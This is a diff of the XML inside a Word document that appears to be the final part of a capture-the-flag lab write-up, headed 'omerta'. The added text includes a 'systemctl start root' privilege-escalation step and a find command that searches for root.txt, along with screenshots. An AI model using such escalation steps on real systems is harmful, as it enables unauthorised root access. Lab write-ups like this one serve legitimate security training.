+                  <wp:posOffset>1790700</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>9525</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1390650" cy="333375"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="2066735702" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1390650" cy="333375"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>s</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>ystemctl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> start root</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="011465DD" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:141pt;margin-top:.75pt;width:109.5pt;height:26.25pt;z-index:251683840;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>s</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>ystemctl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> start root</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B69D0D8" wp14:editId="52CB3EF9">
+            <wp:extent cx="5943600" cy="1092835"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1538461384" name="Picture 11" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1538461384" name="Picture 11" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1092835"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">search for the flag </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C686241" wp14:editId="5A04EF8B">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1209675</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>74930</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2914650" cy="390525"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1454787703" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2914650" cy="390525"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="ListParagraph"/>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="34"/>
+                              </w:numPr>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>find / -name root.txt 2&gt;/dev/null</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="4C686241" id="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:95.25pt;margin-top:5.9pt;width:229.5pt;height:30.75pt;z-index:251685888;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="ListParagraph"/>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="34"/>
+                        </w:numPr>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>find / -name root.txt 2&gt;/dev/null</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>you will get the flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F317C4F" wp14:editId="3B7C5E05">
+            <wp:extent cx="5943600" cy="2205355"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="362438463" name="Picture 10" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="362438463" name="Picture 10" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2205355"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId18"/>
-      <w:footerReference w:type="default" r:id="rId19"/>
+      <w:headerReference w:type="default" r:id="rId42"/>
+      <w:footerReference w:type="default" r:id="rId43"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -3372,15 +8834,15 @@
   <w:p>
     <w:pPr>
       <w:rPr>
-        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black" w:cs="Calibri"/>
+        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black" w:cs="Aharoni"/>
       </w:rPr>
     </w:pPr>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black"/>
+        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black" w:cstheme="majorBidi"/>
         <w:noProof/>
       </w:rPr>
-      <w:t>J</w:t>
+      <w:t>omerta</w:t>
     </w:r>
   </w:p>
 </w:hdr>
@@ -3389,6 +8851,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="01DD2F20"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2116CC62"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="02BD2D08"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AD7CE028"/>
@@ -3501,7 +9076,209 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="04F85AAB"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="12E075DC"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1558105B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7FAC7CF8"/>
+    <w:lvl w:ilvl="0" w:tplc="D668CAF4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
